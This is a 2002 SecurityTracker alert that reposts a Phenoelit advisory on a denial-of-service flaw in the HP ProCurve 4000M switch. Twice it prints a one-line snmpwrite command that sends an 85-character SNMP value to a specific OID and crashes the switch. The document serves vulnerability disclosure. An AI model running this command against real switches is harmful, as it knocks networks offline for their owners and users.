HP ProCurve Switch Can Be Crashed By Remote Users Attempting to Set a Particular SNMP Write Variable
|
|
SecurityTracker Alert ID: 1004861 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 27 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Advisory: Phenoelit Group
|
Version(s): HP J4121A ProCurve Switch 4000M revision C.07.23, ROM C.06.01
|
Description: A denial of service vulnerability was reported in HP's ProCure 4000M switch (J4121A). A remote user can cause the switch to crash.
Phenoelit Group reported that a remote user can attempt to write an SNMP variable with 85 characters to cause the switch to crash
the next time that a remote user connects to the Telnet or HTTP port. The affected SNMP variable is:
.iso.3.6.1.4.1.11.2.36.1.1.2.1.0
A
demonstration exploit example is provided:
linux# snmpwrite <switch_ip> private .iso.3.6.1.4.1.11.2.36.1.1.2.1.0 \
s
`perl -e 'print "A"x85;'`
The vendor has reportedly been notified.
|
Impact: A remote user can cause the switch to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.hp.com/rnd/index.htm (Links to External Site)
|
Cause: Exception handling error
|
Reported By: kim0 <kim0@phenoelit.de>
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 27 Jul 2002 15:53:18 +0200
From: kim0 <kim0@phenoelit.de>
Subject: Phenoelit Advisory 0815 ++ /+ HP ProCurve
|
--------------070407060100070909000705
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
--
kim0 <kim0@phenoelit.de>
Phenoelit (http://www.phenoelit.de)
90C0 969C EC71 01DC 36A0 FBEF 2D72 33C0 77FC CD42
--------------070407060100070909000705
Content-Type: text/plain;
name="HP_ProCurve.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="HP_ProCurve.txt"
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+->
[ Authors ]
FX <fx@phenoelit.de>
kim0 <kim0@phenoelit.de>
Zet <zet@darklab.org>
Phenoelit Group (http://www.phenoelit.de)
Advisory http://www.phenoelit.de/stuff/HP_ProCurve.txt
[ Affected Products ]
Hewlett Packard (HP)
ProCurve Switch
Tested on
HP J4121A ProCurve Switch 4000M
revision C.07.23, ROM C.06.01
HP Bug ID: Not assigned
[ Vendor communication ]
06/29/02 Initial Notification, security-alert@hp.com
*Note-Initial notification by phenoelit
includes a cc to cert@cert.org by default
06/29/02 RBL blocked delivery to security-alert@hp.com
06/29/02 Creation of ho-mail account and resend
07/29/02 Auto-responder reply
07/02/02 Human confirmation, PGP exchange and ack.
07/19/02 Notification of intent to post publically in
apx. 7 days.
07/23/02 Coordination for release date/times
[ Overview ]
HP ProCurve Switches are the current offering in the switch market from
Hewlett Packard.
[ Description ]
SNMP variable accessible by SNMP WRITE with 85 characters crashes the
ProCurve Switch upon next connect to the TELNET or HTTP Port
(.iso.3.6.1.4.1.11.2.36.1.1.2.1.0)
[ Example ]
linux# snmpwrite <switch_ip> private .iso.3.6.1.4.1.11.2.36.1.1.2.1.0 \
s `perl -e 'print "A"x85;'`
[ Solution ]
None known at this time.
[ end of file ]
--------------070407060100070909000705--
|
|
